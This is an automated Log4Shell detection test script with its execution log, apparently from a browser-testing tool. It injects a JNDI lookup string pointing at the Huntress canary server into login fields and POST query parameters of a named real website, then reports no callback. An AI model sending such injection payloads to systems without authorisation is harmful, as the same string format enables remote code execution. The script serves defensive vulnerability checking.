xxxxxxxxxx//// Change this to the site you wish to test against// As mentioned on huntress Log4Shell, a negative test does // NOT mean that your site is not vulnerable.//// While this script is meant to be generic, you can modify// it to be specific to your login page manually if needed.//// See: https://log4shell.huntress.com///// Note this script was last updated : 14th Dec 2021//// !!! MODIFY THE SITE URL HERE (phptravels, is a dummy testing site)let testSite = "https://glints.com/sg"//------------------------------------------------------------------------TEST.log.info("DISCLAIMER: Your site is not guranteed to be safe, if this test passes, it only means you are definately vunerable if it fails - see : https://log4shell.huntress.com/ for more info.")TEST.log.info("This test snippet/test function should ONLY be used against sites you are permitted to test against")// Function which helps make this test, easily reusable across multiple URLSSfunction testWebsiteForLog4Shell(testURL) { // Lets get the log4shell test token I.goTo("https://log4shell.huntress.com/") let log4shell_id = I.getText("/html/body/main/div/p[5]/code") let log4shell_str = "${jndi:ldap://log4shell.huntress.com:1389/"+log4shell_id+"}"; TEST.log.info("Log4Shell Test ID: "+log4shell_id) // Lets go to the target site, and test it I.goTo(testURL) //------------------------------------------------------------------------ //-------------------------- // Use and modify this login script specific to your site use case // if the automatic one does not work //-------------------------- // I.fill("Username", log4shell_str); // I.fill("Password", log4shell_str);Hi, I'm TAMI (Test Authoring Machine Intelligence).
Let me assist you in writing a test. Tell me a scenario to test, and I’ll write the test script for you!
SUCCESS!
1m 22s (22s)
1.
[start of test]
2.
DISCLAIMER: Your site is not guranteed to be safe, if this test passes, it only means you are definately vunerable if it fails - see : https://log4shell.huntress.com/ for more info.
3.
This test snippet/test function should ONLY be used against sites you are permitted to test against
4.
I go to "https://log4shell.huntress.com/"
1.3s
5.
I get text from "/html/body/main/div/p[5]/code"
0.1s
6.
Log4Shell Test ID: 803b16b7-56eb-49ba-97dc-b492f88b9220
7.
I go to "https://glints.com/sg"
5.1s
8.
I click "Login"
9.
I click "Password"
10.
I fill "Password": "${jndi:ldap://log4shell.huntress.com:1389/803b16b7-56eb-49ba-97dc-b492f88b9220}"
2.5s
11.
I click "Email"
12.
I fill "Email": "${jndi:ldap://log4shell.huntress.com:1389/803b16b7-56eb-49ba-97dc-b492f88b9220}"
2.9s
13.
I click "Login"
14.
I wait for 5s
5.0s
15.
POST https://glints.com/sg?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D
Info: 404
3.4s
16.
POST https://glints.com/sg/api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D
Info: 404
0.8s
17.
POST api.https://glints.com/sg?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D
Info: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'api.https://glints.com/sg?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D'.
18.
POST api.https://glints.com/sg/api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D
Info: Failed to execute 'send' on 'XMLHttpRequest': Failed to load 'api.https://glints.com/sg/api?x=%24%7Bjndi%3Aldap%3A%2F%2Flog4shell.huntress.com%3A1389%2F803b16b7-56eb-49ba-97dc-b492f88b9220%7D'.
19.
I go to "https://log4shell.huntress.com/view/803b16b7-56eb-49ba-97dc-b492f88b9220"
1.0s
20.
GET https://log4shell.huntress.com/json/803b16b7-56eb-49ba-97dc-b492f88b9220
0.1s
21.
No active Log4Shell exploit found
22.
[end of test]
